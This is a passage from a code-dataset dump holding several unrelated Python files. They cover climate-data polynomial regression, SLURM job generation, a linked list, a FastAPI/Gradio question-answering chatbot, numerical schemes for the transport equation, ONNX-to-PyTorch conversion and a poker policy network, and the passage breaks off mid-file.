pd.read_csv('Main_dataset_globalwarming.csv', names = columns)\r\n#print (df.tail())\r\n\r\n#Normalizing data by using min-max\r\nfrom sklearn.preprocessing import MinMaxScaler\r\npre_scaled = pd.DataFrame()\r\npre_scaled['Year'], pre_scaled['No smoothing'] = df['Year'], df['No smoothing']\r\nmin_max_scaler = MinMaxScaler()\r\ndata_minmax = min_max_scaler.fit_transform(pre_scaled)\r\nscaled_df = pd.DataFrame(data_minmax, columns = ['Year', 'No smoothing'])\r\n#print(scaled_df.tail())\r\n\r\n\r\n#Creating model\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\nX_train, X_test, Y_train, Y_test = train_test_split(scaled_df['Year'], scaled_df['No smoothing'])\r\n#print(X_train.tail())\r\nX_train_df, X_test_df = pd.DataFrame(X_train), pd.DataFrame(X_test)\r\n\r\ndegree_usr = 5\r\npoly = PolynomialFeatures(degree = degree_usr)\r\nX_train_poly, X_test_poly = poly.fit_transform(X_train_df), poly.fit_transform(X_test_df)\r\n\r\nfrom sklearn import linear_model\r\nmodel = linear_model.LinearRegression()\r\nmodel = model.fit(X_train_poly, Y_train)\r\ncoefficient = model.coef_\r\nintercep = model.intercept_\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np \r\nstep = 1/139\r\nx_axis = np.arange(0, 1, step)\r\n\r\n#Creating the polynomial equation\r\nresponse = intercep + coefficient[1] * x_axis + coefficient[2] * x_axis**2 + coefficient[3]*x_axis**3 + coefficient[4]*x_axis**4 + coefficient[5]*x_axis**5 #+ coefficient[6]*x_axis**6\r\n\r\n#Metrics\r\nfrom sklearn.metrics import r2_score\r\nprediction = model.predict(X_test_poly)\r\nr_squared = r2_score(prediction, Y_test)\r\nprint('Prediction: ', prediction)\r\nprint('\\n')\r\nprint('R^2: ', r_squared)\r\n\r\nrscld_df = min_max_scaler.inverse_transform(scaled_df)\r\nrscld_df = pd.DataFrame(rscld_df, columns = ['Year', 'No smoothing'])\r\n#print(rscld_df.tail())\r\n\r\nrscld_res = pd.DataFrame(response, columns = ['No smoothing'])\r\nrscld_axis = pd.DataFrame(x_axis, columns = ['Year'])\r\nrscld_prediction = pd.DataFrame(prediction, columns = ['No smoothing'])\r\nrscld_response = pd.DataFrame()\r\nrscld_response['Year'], rscld_response['No smoothing'] = rscld_axis['Year'], rscld_res['No smoothing']\r\n\r\nrscld_response = min_max_scaler.inverse_transform(rscld_response)\r\nrscld_response = pd.DataFrame(rscld_response, columns = ['Year', 'No smoothing'])\r\n\r\n#print(rscld_response.tail())\r\n\r\nplt.scatter(rscld_df['Year'], rscld_df['No smoothing'], color = 'b')\r\nplt.plot(rscld_response['Year'], rscld_response['No smoothing'], color = 'r')\r\nplt.xlabel('Years')\r\nplt.ylabel('Offset °C from ideal temperature')\r\nplt.legend(['Model', 'Raw data'], loc = 'upper left')\r\nplt.show()\r\n\r\nchoice = input('Would you like to make a prediction? (Y/N) \\n')\r\nwhile choice == 'Y':\r\n Target = input('Type year you wish to know temp of\\n')\r\n Target = int(Target) + 1\r\n \r\n size = Target - 1880\r\n ro3 = size/139\r\n stepp = 1 / 139\r\n \r\n axis = np.arange(0, ro3, stepp)\r\n axis_fake = np.arange(1880, Target, 1)\r\n \r\n period = len(axis)\r\n array = np.reshape(axis, (period, 1))\r\n array_fake = np.reshape(axis_fake, (len(axis_fake), 1))\r\n\r\n res = intercep + coefficient[1] * axis + coefficient[2] * axis**2 + coefficient[3]*axis**3 + coefficient[4]*axis**4 + coefficient[5]*axis**5 #+ coefficient[6]*axis**6\r\n df_res = pd.DataFrame(res, columns = ['Temperature'])\r\n df_axis = pd.DataFrame(array, columns = ['Year'])\r\n df_fake = pd.DataFrame(array_fake, columns = ['Year'])\r\n \r\n final_df = pd.DataFrame()\r\n final_df['Year'], final_df['Temperature'] = df_axis['Year'], df_res['Temperature']\r\n final_df = min_max_scaler.inverse_transform(final_df)\r\n final_df = pd.DataFrame(final_df, columns = ['Year', 'Temperature'])\r\n final_final =pd.DataFrame()\r\n final_final['Year'], final_final['Offset °C from ideal temp'] = df_fake['Year'], final_df['Temperature']\r\n print(final_final.tail())\r\n \r\n choice = input('Would you like to make another prediction? (Y/N)\\n')\r\n\r\n","repo_name":"DarienRG/gwp","sub_path":"Global_warming_poly2nd.py","file_name":"Global_warming_poly2nd.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5314060643","text":"import os\nimport sys\n\nEXPERIMENT = sys.argv[1] # PRJNA347654\nTHREADS = sys.argv[2]\n\nsamples = os.listdir(\"/g100_scratch/userexternal/dgambitt/ASD/MM/\" + EXPERIMENT)\nsamples = set([s.split('.')[0] for s in samples])\n\nprint(samples)\n\nprint(\"#!/bin/bash\")\n\nfor sample in samples:\n run = \"sbatch --export=ALL,SAMPLE={}/{},THREADS={},OUT={}\".format(\n EXPERIMENT, sample, THREADS, sample)\n run += \" --job-name={}_thalign --output={}.out --error={}.err\".format(\n sample[-3:], sample, sample\n )\n run += \" ~/bio-scripts/TopHat2/launch_tophat2.sh\"\n print(run)\n\n","repo_name":"damgambit/bio-scripts","sub_path":"STAR/generate_STAR_alignment_job.py","file_name":"generate_STAR_alignment_job.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71335175112","text":"# encoding:utf-8\n\n\ndef fibs(num):\n result = [0, 1]\n for i in range(num):\n result.append(result[-2] + result[-1])\n return result\n\nprint(fibs(8))\n\n\n# 关键字参数与参数默认值 ----------------------------------------------------------\ndef say_hello(greeting='Hello', name='World'):\n print('%s, %s' % (greeting, name))\n\n# 输出:Hello, James\nsay_hello(name=\"James\")\n\n\n# 收集参数 -----------------------------------------------------------------------\n# *params: 将剩余参数收集为元组\n# **params: 将剩余参数收集为字典\ndef print_names(greeting, *names, **desc):\n for name in names:\n print('%s, %s' % (greeting, name))\n print(desc)\n\n# 输出:\n# Hi, James\n# Hi, Mike\n# Hi, Philip\n# {'name': 'Simon', 'age': 24}\nprint_names(\"Hi\", \"James\", \"Mike\", \"Philip\", name=\"Simon\", age=24)\n\ncontent = {'name': 'Simon', 'greeting': 'Hi'}\n# 参数收集逆过程:将字典解析为关键字参数,或将序列解析为可变参数 ----------------------\nsay_hello(**content)\n\n\n# 作用域:内部作用域(如:函数)不能影响全局变量 -------------------------------------\ndef change_x():\n x = 10\n\n\n# 局部作用域中改变全局变量 ---------------------------------------------------------\n# 1.globals()['param']: 获取全局变量\n# 2.声明全局变量: global param,然后直接修改全局变量param\ndef change_global_x():\n global x\n x = 15\n\nx = 5\nchange_x()\n# 输出:5\nprint(x)\nchange_global_x()\n# 输出:15\nprint(x)\n\n\n# nonlocal: 外部作用域 --------------------------------------------------------------\ndef change_local():\n p_a = 10\n p_b = 10\n\n def change_param():\n p_a = 12\n # 使用外部作用域的变量\n nonlocal p_b\n p_b = 12\n change_param()\n # 输出:10\n print(p_a)\n # 输出:12\n print(p_b)\n\nchange_local()\n\n# lambda表达式:lambda *params : operate(params) ------------------------------------\n# python常用函数:\n# map(func, seq[, seq, ......]) 对序列中的每个元素应用函数\n# filter(func, seq) 返回其函数为真的元素的列表\n# reduce(func, seq[, initial]) 将序列前两个元素与给定函数联合使用,并将返回值与第三个元素继续联合使用,直到序列处理完毕\n# sum(seq) 返回序列所有元素的和\n# apply(func[, args[, kwargs]]) 调用函数,可以提供参数\nnumbers = [1, 3, 4, 8, 10, 15]\nfilter_numbers = filter(lambda num: num % 2 == 0, numbers)\nfor number in filter_numbers:\n print(number)\n","repo_name":"xishang/demos","sub_path":"Python/base-demo/FunctionDemo.py","file_name":"FunctionDemo.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"25336591362","text":"import io\nimport sys\n\n_INPUT = \"\"\"\\\n6\n2 19\n2 3\n5 6\n2 18\n2 3\n5 6\n3 1001\n1 1\n2 1\n100 10\n\"\"\"\n\nsys.stdin = io.StringIO(_INPUT)\ncase_no=int(input())\nfor __ in range(case_no):\n N,X=map(int,input().split())\n dp=[0]*(10**4+1)\n dp[0]=1\n for i in range(N):\n A,B=map(int,input().split())\n for j in reversed(range(10**4+1)):\n if dp[j]==1:\n for k in range(B):\n if j+(k+1)*A<=10**4: dp[j+(k+1)*A]=1\n if dp[X]==1: print('Yes')\n else: print('No')","repo_name":"katonyonko/ABC286","sub_path":"ABC286_D.py","file_name":"ABC286_D.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5048500857","text":"def sumNumbersDaysYear (arrayDays):\n months = 0\n function_result = 0\n while months < 12:\n i = 0\n for i in range(arrayDays[months]):\n function_result += sum(map(int, str(i + 1)))\n months += 1\n return function_result\n \ninfinity = 0\ntrust_operation = False\nwhile infinity != 1:\n daysRegularYear = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n result = 0\n while True:\n try:\n year = int(input('Введите год: '))\n if year > 0:\n trust_operation = True\n else:\n trust_operation = False\n except:\n print('Ошибка')\n if trust_operation == True:\n break\n if year % 4 == 0:\n daysRegularYear[1] = 29\n result = sumNumbersDaysYear(daysRegularYear)\n print(f\"В {year} такая сумма: {result}\")\n else:\n result = sumNumbersDaysYear(daysRegularYear)\n print(f\"В {year} такая сумма: {result}\")\n infinity = int(input('Введите любое число, чтобы продолжить или 1, чтобы завершить программу: '))","repo_name":"l1r1k/sumNumberYear","sub_path":"sumNumbers.py","file_name":"sumNumbers.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"19853131232","text":"#!/usr/bin/env python3\nimport typing\nimport logging\nimport openai\nfrom chat_utils import ask\nimport os\nimport gradio as gr\nimport requests\nfrom typing import Dict, Any, Optional, List\nfrom enum import Enum\nimport json\n\n\nBEARER_TOKEN: str = os.environ.get(\"BEARER_TOKEN\")\nGENAI_DATA_ASK_API_ENDPOINT: str = os.environ.get(\"GENAI_DATA_ASK_API_ENDPOINT\")\nassert BEARER_TOKEN != None\nassert GENAI_DATA_ASK_API_ENDPOINT != None\n\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\nimport gradio as gr\nfrom a2wsgi import ASGIMiddleware\n\n# from predict import predict\nfast_app = FastAPI()\n\nclass Source(str, Enum): \n email = \"email\" \n file = \"file\" \n chat = \"chat\" \n sql = \"sql\" \n\nclass Metadata(BaseModel): \n source: Optional[Source] = None \n source_id: Optional[str] = None \n url: Optional[str] = None \n created_at: Optional[str] = None \n author: Optional[str] = None \n database: Optional[str] = None \n tables: Optional[str] = None \n sql: Optional[str] = None \n \nclass ChunkWithMetadata(BaseModel): \n text: str \n metadata: Metadata \n \n def format_with_metadata(self) -> str: \n if self.metadata.tables: \n return f\"{self.metadata.tables}:{self.text}\" \n return f\"{self.metadata.source_id}:{self.text}\" \n\n\nclass Answer(BaseModel): \n content: str\n metadata: List[ChunkWithMetadata]\n \ndef dispatch_payload(payload: Dict[str, Any]) -> Answer:\n headers: Dict[str, str] = {\n \"Authorization\": f\"Bearer {BEARER_TOKEN}\"\n }\n #url: str = f\"{GENAI_DATA_ASK_API_ENDPOINT}/ask\"\n url: str = f\"{GENAI_DATA_ASK_API_ENDPOINT}/ask?structured=true\"\n response: requests.Response = requests.post(url=url, headers=headers, json=payload)\n status_code = response.status_code\n content = response.json()\n print(f\"status_code: {status_code}\")\n print(f\"content:\")\n print(json.dumps(content, indent=4))\n ask = content.get('answer')\n return Answer(**ask)\n\ndef create_payload(question: str) -> Dict[str, Any]:\n\n payload: Dict[str, Any] = {\n \"ask\": {\n \"question\": question\n }\n }\n return payload\n\ndef ask(question: str):\n payload = create_payload(question)\n response: Answer = dispatch_payload(payload)\n metadata: List[ChunkWithMetadata] = response.metadata\n # output = ''\n # for m in metadata:\n # output = output + str(m) + \"\\n\"\n # #m.metadata.\n print(response.content)\n #print(output)\n return response.content\n\ndef split_response(input_text: str, history: List):\n history = history or []\n response = chatbot(input_text)\n # print(response)\n # if \"(Sources:\" in response:\n # answer_response, sources = response.split(\"(Sources:\", 1)\n # print(answer_response)\n # sources = \"(Sources: \" + sources\n # print(sources)\n # elif \"(source:\" in response:\n # answer_response, sources = response.split(\"(source:\", 1)\n # print(answer_response)\n # sources = \"(source: \" + sources\n # print(sources)\n # else: \n # answer_response, sources = response, \"\"\n \n # full_response = f\"{input_text}\\n\\n{answer_response}\\n\\n\"\n \n #history.append((input_text, answer_response))\n \n print(response)\n \n #return history, history\n #return answer_response\n return response\n\ndef chatbot(conversation):\n new_message = ask(conversation)\n #return \"User: \" + conversation + \"\\n\\nSystem: \" + new_message + \"\\n\\n\"\n return new_message\n\n# --- fastapi /predict route ---\n\n\nclass Request(BaseModel):\n question: str\n\n\nclass Result(BaseModel):\n score: float\n title: str\n text: str\n\n\nclass Response(BaseModel):\n results: typing.List[Result]\n\n\n\nclass Source(str, Enum):\n email = \"email\"\n file = \"file\"\n chat = \"chat\"\n sql = \"sql\"\n\nclass Ask(BaseModel):\n question: str\n\n\n\n@fast_app.post(\"/predict\", response_model=Response)\nasync def predict_api(request: Request):\n results = ask(request.question)\n return Response(\n results=[\n Result(score=r[\"score\"], title=r[\"title\"], text=r[\"text\"]) for r in results\n ]\n )\n\n\n# --- gradio demo ---\n\n\ndef gradio_predict(question: str):\n results = ask(question)\n\n best_result = results[0]\n\n return f\"{best_result['title']}\\n\\n{best_result['text']}\", best_result[\"score\"]\n\n\ndemo = gr.Interface(\n fn=chatbot,\n inputs=gr.Textbox(\n label=\"Ask a question about the data\", placeholder=\"What is BASEL III?\"\n ),\n outputs=[gr.Textbox(label=\"Answer\")], #, gr.Number(label=\"Score\")],\n allow_flagging=\"never\",\n)\n\n\ngr_app = gr.mount_gradio_app(fast_app, demo, path=\"/\")\napp = ASGIMiddleware(gr_app)\n\n\n\n","repo_name":"Griffin-Lane/chat_ui","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"44396486622","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n \n def append_to_tail(self, data):\n end_node = Node(data)\n node = self\n while(node.next != None):\n node = node.next\n node.next = end_node \n\n\nclass linkedlist:\n def __init__(self, data):\n self.head = Node(data)\n\n def delete_node(self, data):\n node = self.head\n\n if (node.data == data):\n self.head = self.head.next\n return\n\n while(node.next != None):\n if node.next.data == data:\n node.next = node.next.next\n return\n node = node.next\n \n return\n \n def print_all(self):\n node = self.head\n while(node.next is not None):\n print(node.data)\n node = node.next\n print(node.data) # Last node\n \n \n\n\nif __name__ == \"__main__\":\n test = linkedlist(10)\n print(test.head.data)\n test.head.append_to_tail(20)\n print(test.head.next.data)\n test.delete_node(20)\n print(test.head.data)","repo_name":"MubashirullahD/cracking-the-coding-interview","sub_path":"chapter2/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"26895349389","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport random\nfrom matplotlib.animation import FuncAnimation\n\nN = 100\nn = 50\nh = 0.1\nL = N * h\ntau = 0.1\nT = n * tau\na = 0.8\nu1 = 10\nu2 = 0\nsigma = a * tau / h\n\nq = 0.25\nepsilon = 1e-10\n\n\ndef true_func(x, t):\n return u1 if x < a * t else u2\n\n\ndef explicit_left_corner(_, __, um, um_1, ___):\n return um - sigma * (um - um_1)\n\n\ndef implicit_left_corner(um_1, _, um, __, ___):\n return (um + sigma * um_1) / (1 + sigma)\n\n\ndef reversed_implicit_left_corner(unext, uprev):\n sigma = -1.2 * tau / h\n return (1 + sigma) * unext / sigma - uprev / sigma\n\n\ndef laks(_, ump1, __, um_1, ___):\n return 0.5 * (ump1 + um_1) - 0.5 * sigma * (ump1 - um_1)\n\n\ndef laks_vendrof(_, ump1, um, um_1, __):\n return um - sigma * (um - um_1) - 0.5 * sigma * (1 - sigma) * (ump1 + um_1 - 2 * um)\n\n\ndef smooth_laks_vendrof(ump2, ump1, um, um_1, um_2):\n Dmm = um_1 - um_2\n Dm = um - um_1\n Dp = ump1 - um\n Dpp = ump2 - ump1\n Qp = Dp if Dpp * Dp < 0 or Dp * Dm < 0 else 0\n Qm = Dm if Dmm * Dm < 0 or Dp * Dm < 0 else 0\n return um + q * (Qp - Qm)\n\n\ndef beam_uorming(_, __, um, um_1, um_2):\n return um - sigma * (1.5 * um - 2 * um_1 + 0.5 * um_2) + 0.5 * sigma ** 2 * (um - 2 * um_1 + um_2)\n\n\ndef TVD(_, ump1, um, um_1, um_2):\n rm = (um - um_1 + epsilon) / (ump1 - um + epsilon)\n rm_1 = (um_1 - um_2 + epsilon) / (um - um_1 + epsilon)\n phi = min(2, rm) if rm > 1 else min(2 * rm, 1) if rm > 0 else 0\n phi_1 = min(2, rm_1) if rm_1 > 1 else min(2 * rm_1, 1) if rm_1 > 0 else 0\n return um - sigma * (um - um_1) - 0.5 * sigma * (1 - sigma) * (phi * (ump1 - um) - phi_1 * (um - um_1))\n\n\nclass UpdatePlot:\n def __init__(self, ax, title='', right_func=None, main_func=None, left_func=None, smooth_lv=False,\n reversed_left_implicit=False):\n self.right_func = right_func\n self.main_func = main_func\n self.left_func = left_func\n self.smooth_lv = smooth_lv\n self.reversed_left_implicit = reversed_left_implicit\n\n self.notes = np.arange(0, L, h)\n self.spec_notes = np.arange(0, L, h / 3)\n self.true_u = np.ones(3 * N) * u2\n if not self.reversed_left_implicit:\n self.true_u[0] = u1\n else:\n self.true_u[-1] = u1\n\n self.line, = ax.plot([], [], c='black')\n color = random.choice(['blue', 'green', 'purple', 'olive', 'darkorchid', 'deepskyblue', 'darkgoldenrod'])\n self.scat = ax.scatter([], [], c=color)\n self.ax = ax\n\n self.ax.set_ylim(u2 - 2, u1 + 2)\n self.ax.set_xlim(0, L + h)\n self.ax.set_title(title)\n self.ax.grid(True)\n\n self.prev_u = np.ones(N) * u2\n if not self.reversed_left_implicit:\n self.prev_u[0] = u1\n else:\n self.prev_u[-1] = u1\n self.next_u = np.ones(N) * u1\n if self.smooth_lv:\n self.smooth_u = self.prev_u\n\n def __call__(self, i):\n # This way the plot can continuously run and we just keep\n # watching new realizations of the process\n if i == 0:\n self.line.set_data(self.spec_notes, self.true_u)\n if not self.smooth_lv:\n self.scat.set_offsets(np.stack([self.notes, self.prev_u]).T)\n else:\n self.scat.set_offsets(np.stack([self.notes, self.smooth_u]).T)\n return self.line, self.scat\n\n if not self.reversed_left_implicit:\n self.true_u = np.array(list(map(lambda x: true_func(x, (i + 1) * tau), self.spec_notes)))\n if self.right_func is not None:\n self.next_u[1] = self.right_func(self.next_u[0], self.prev_u[2], self.prev_u[1], self.prev_u[0], None)\n else:\n self.next_u[1] = self.main_func(self.next_u[0], self.prev_u[2], self.prev_u[1], self.prev_u[0], None)\n\n for j in range(2, N - 1):\n self.next_u[j] = self.main_func(self.next_u[j - 1], self.prev_u[j + 1], self.prev_u[j],\n self.prev_u[j - 1],\n self.prev_u[j - 2])\n\n if self.left_func is not None:\n self.next_u[-1] = self.left_func(self.next_u[-2], None, self.prev_u[-1], self.prev_u[-2],\n self.prev_u[-3])\n else:\n self.next_u[-1] = self.main_func(self.next_u[-2], None, self.prev_u[-1], self.prev_u[-2],\n self.prev_u[-3])\n\n if self.smooth_lv:\n self.smooth_u = self.next_u.copy()\n for j in range(2, N - 2):\n self.smooth_u[j] = smooth_laks_vendrof(self.next_u[j + 2], self.next_u[j + 1], self.next_u[j],\n self.next_u[j - 1], self.next_u[j - 2])\n\n\n else:\n self.true_u = np.array(list(map(lambda x: u2 if x < L - 1.2 * (i + 1) * tau else u1, self.spec_notes)))\n\n for j in range(N - 2, -1, -1):\n self.next_u[j] = reversed_implicit_left_corner(self.next_u[j + 1], self.prev_u[j + 1])\n\n self.prev_u = self.next_u\n self.next_u = np.ones(N) * u1\n\n self.line.set_data(self.spec_notes, self.true_u)\n if not self.smooth_lv:\n self.scat.set_offsets(np.stack([self.notes, self.prev_u]).T)\n else:\n self.scat.set_offsets(np.stack([self.notes, self.smooth_u]).T)\n\n return self.line, self.scat\n\n\ndef main():\n fig, ax = plt.subplots(figsize=(12, 6))\n ud = UpdatePlot(ax, title='Explicit left corner', main_func=explicit_left_corner)\n # ud = UpdatePlot(ax, title='Implicit left corner', main_func=implicit_left_corner)\n # ud = UpdatePlot(ax, title='Implicit left corner', reversed_left_implicit=True)\n # ud = UpdatePlot(ax, title='Laks', main_func=laks, left_func=explicit_left_corner)\n # ud = UpdatePlot(ax, title='Laks Vendrof', main_func=laks_vendrof, left_func=explicit_left_corner, smooth_lv=True)\n # ud = UpdatePlot(ax, title='Beam Uorming', main_func=beam_uorming, right_func=explicit_left_corner)\n # ud = UpdatePlot(ax, title='TVD', main_func=TVD, left_func=explicit_left_corner, right_func=explicit_left_corner)\n anim = FuncAnimation(fig, ud, frames=55, interval=200, blit=True, repeat=False)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"amansyayf/computational-mathematics","sub_path":"transport equation.py","file_name":"transport equation.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"38628879141","text":"import onnx\nimport torch\nfrom onnx2torch import convert\n\n\ndef onnx_to_torch(onnx_model_path):\n \"\"\"Converts an ONNX model to a PyTorch model.\n\n Args:\n onnx_model_path: The path to the ONNX model.\n\n Returns:\n A PyTorch model.\n \"\"\"\n x = torch.randn(1, 1024)\n\n frame_num = torch.tensor([2])\n hidden = 48\n depth = 4\n if depth == 4:\n conv_state_sizes = [\n (1, hidden, 148),\n (1, hidden * 2, 36),\n (1, hidden * 4, 8),\n (1, hidden * 4, 4),\n (1, hidden * 2, 4),\n (1, hidden, 4),\n (1, 1, 4)\n ]\n else:\n conv_state_sizes = [\n (1, hidden, 596),\n (1, hidden * 2, 148),\n (1, hidden * 4, 36),\n (1, hidden * 8, 8),\n (1, hidden * 8, 4),\n (1, hidden * 4, 4),\n (1, hidden * 2, 4),\n (1, hidden, 4),\n (1, 1, 4)\n ]\n resample_buffer = 64\n conv_state_list = [torch.randn(size) for size in conv_state_sizes]\n conv_state = torch.cat([t.view(1, -1) for t in conv_state_list], dim=1)\n lstm_state_1 = torch.randn(2, 1, hidden * 2 ** (depth - 1))\n lstm_state_2 = torch.randn(2, 1, hidden * 2 ** (depth - 1))\n resample_input_frame = torch.randn(1, resample_buffer)\n resample_out_frame = torch.randn(1, resample_buffer)\n\n onnx_model = onnx.load(onnx_model_path)\n torch_model = torch.jit.trace(onnx_model, example_inputs=(x, frame_num, resample_input_frame, resample_out_frame,\n conv_state, lstm_state_1, lstm_state_2))\n return torch_model\n\n\nif __name__ == \"__main__\":\n onnx_model_path = \"D:/zeynep/data/noise-cancelling/denoiser/dns/hidden=48-depth=4/dns48_depth=4_stream.onnx\"\n #torch_model = onnx_to_torch(onnx_model_path)\n\n\n # Path to ONNX model\n # You can pass the path to the onnx model to convert it or...\n torch_model_1 = convert(onnx_model_path)\n print(torch_model_1)\n # Or you can load a regular onnx model and pass it to the converter\n onnx_model = onnx.load(onnx_model_path)\n torch_model_2 = convert(onnx_model)\n print(torch_model_2)\n","repo_name":"zeynepgulhanuslu/denoiser-onnx","sub_path":"onnx_to_torch.py","file_name":"onnx_to_torch.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"81832979","text":"## @package policy_network_model\n# @brief A model of a neural network policy that assesses the current state in the\n# form of a prediction of the expected outcome of a round (win / draw / loss)\n\nfrom keras.layers.core import Dense, Dropout\nfrom keras.models import Sequential, load_model, Model\nfrom keras.callbacks import ModelCheckpoint\nfrom source.networks.policy_network.policy_network_settings import POLICY_HIDDEN_LAYERS_QUANTITY, \\\n POLICY_NEURONS_QUANTITY\nfrom source.networks.policy_network.policy_network_settings import POLICY_BATCH_SIZE, POLICY_DATASET_SIZE, POLICY_EPOCHS\nfrom source.poker_items import Deck, Hand, Card\n\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\n## Policy network model class\nclass PolicyNetwork:\n def __init__(self): # Later - more parameters\n self.history = None\n\n self.checkpoint_path = \"networks/policy_network/trainings/training_2/cp.ckpt\"\n self.checkpoint_abs_path = os.path.abspath(self.checkpoint_path)\n\n self.layers_quant = POLICY_HIDDEN_LAYERS_QUANTITY\n self.neurons_quant = POLICY_NEURONS_QUANTITY\n\n self.model = Sequential()\n\n # Input layer\n self.model.add(Dense(14, input_dim=14))\n\n # Hidden layers\n for i in range(POLICY_HIDDEN_LAYERS_QUANTITY):\n self.model.add(Dense(POLICY_NEURONS_QUANTITY, activation='relu'))\n self.model.add(Dropout(0.2))\n\n # Output layer\n self.model.add(Dense(1, activation='relu')) # from -12 to 9\n\n # Compile model\n self.model.compile(loss='mean_squared_error', optimizer='adam', metrics=['accuracy'])\n\n ## Function that creates full dataset with fixed size\n # @input The size of needed dataset\n # @return Game situation (array of cards) and true value won/draw/lost\n def create_full_dataset(self, size=POLICY_DATASET_SIZE):\n\n training_set = []\n true_results_set = []\n\n for _ in range(size):\n train, result = self.create_train()\n training_set.append(train)\n true_results_set.append(result)\n\n numpy_training_set = np.array(training_set)\n numpy_true_results_set = np.array(true_results_set)\n\n return numpy_training_set, numpy_true_results_set\n\n ## Function that creates one random game position\n # @return Game situation (array of cards) and true value won/draw/lost\n def create_train(self):\n train = []\n open_cards_quantity = random.randint(2, 5)\n deck = Deck()\n deck.shuffle()\n\n hand1 = Hand()\n hand2 = Hand()\n board = Hand()\n\n for i in range(2):\n hand1.add_card(deck.get_card())\n for i in range(2):\n hand2.add_card(deck.get_card())\n for i in range(5):\n board.add_card(deck.get_card())\n\n round_result = 0\n if hand1.better_than(hand2, board):\n round_result = 2 # Player wins\n elif hand1.worse_than(hand2, board):\n round_result = 0 # Opponent wins\n elif hand1.equal_to(hand2, board):\n round_result = 1 # Draw\n\n values = []\n suits = []\n\n # In hand 1\n for card in hand1.cards:\n values.append(card.value)\n\n # suits = [\"♠\", \"♣\", \"♥\", \"♦\"] # \"spades\", \" clubs\", \"hearts\", \"diamonds\"\n if card.suit == '0':\n suits.append(0)\n elif card.suit == \"♠\":\n suits.append(1)\n elif card.suit == \"♣\":\n suits.append(2)\n elif card.suit == \"♥\":\n suits.append(3)\n elif card.suit == \"♦\":\n suits.append(4)\n\n # In board\n for i in range(open_cards_quantity):\n values.append(board.cards[i].value)\n\n # suits = [\"♠\", \"♣\", \"♥\", \"♦\"] # \"spades\", \" clubs\", \"hearts\", \"diamonds\"\n\n if board.cards[i].suit == \"♠\":\n suits.append(1)\n elif board.cards[i].suit == \"♣\":\n suits.append(2)\n elif board.cards[i].suit == \"♥\":\n suits.append(3)\n elif board.cards[i].suit == \"♦\":\n suits.append(4)\n for i in range(5 - open_cards_quantity):\n values.append(0)\n suits.append(0)\n\n numpy_train = np.array(values + suits) # Convert our array to numpy array\n # numpy_train = np.array(values)\n # print(numpy_train.shape)\n return numpy_train, round_result\n\n ## Function that starts network training\n def start_training(self):\n checkpoint_callback = ModelCheckpoint(filepath=self.checkpoint_path, save_weights_only=True, verbose=1)\n training_set, true_results_set = self.create_full_dataset()\n # true_results_set = true_results_set.reshape(10000, 1, 1)\n self.history = self.model.fit(training_set, true_results_set, epochs=POLICY_EPOCHS,\n batch_size=POLICY_BATCH_SIZE,\n callbacks=[checkpoint_callback])\n\n ## A function that visualizes the results of the last training session in the form of graphs of changes in\n # accuracy and losses over time\n def visualize_studying_results(self):\n # print(self.history.history.keys())\n # summarize history for accuracy\n plt.plot(self.history.history['accuracy'])\n # plt.plot(self.history.history['val_accuracy'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n # self.history.history[]\n # summarize history for loss\n plt.plot(self.history.history['loss'])\n # plt.plot(self.history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n\n ## A function that evaluates the policy for the transferred game state\n # @param hand: Cards in players hand\n # @param board: Cards on board (the unknown are coded as 00)\n # @return The policy value of the current state\n def predict(self, hand, board):\n values = []\n suits = []\n\n for card in hand.cards:\n values.append(card.value)\n\n # suits = [\"♠\", \"♣\", \"♥\", \"♦\"] # \"spades\", \" clubs\", \"hearts\", \"diamonds\"\n if card.suit == '0':\n suits.append(0)\n elif card.suit == \"♠\":\n suits.append(1)\n elif card.suit == \"♣\":\n suits.append(2)\n elif card.suit == \"♥\":\n suits.append(3)\n elif card.suit == \"♦\":\n suits.append(4)\n\n for card in board.cards:\n values.append(card.value)\n\n # suits = [\"♠\", \"♣\", \"♥\", \"♦\"] # \"spades\", \" clubs\", \"hearts\", \"diamonds\"\n if card.suit == '0':\n suits.append(0)\n elif card.suit == \"♠\":\n suits.append(1)\n elif card.suit == \"♣\":\n suits.append(2)\n elif card.suit == \"♥\":\n suits.append(3)\n elif card.suit == \"♦\":\n suits.append(4)\n\n input = np.array([values + suits])\n\n return self.model.predict(input)\n\n ## A function that evaluates the current version of network\n # @return Average accuracy and loss for a random test data set\n def evaluate(self):\n x_test, y_test = 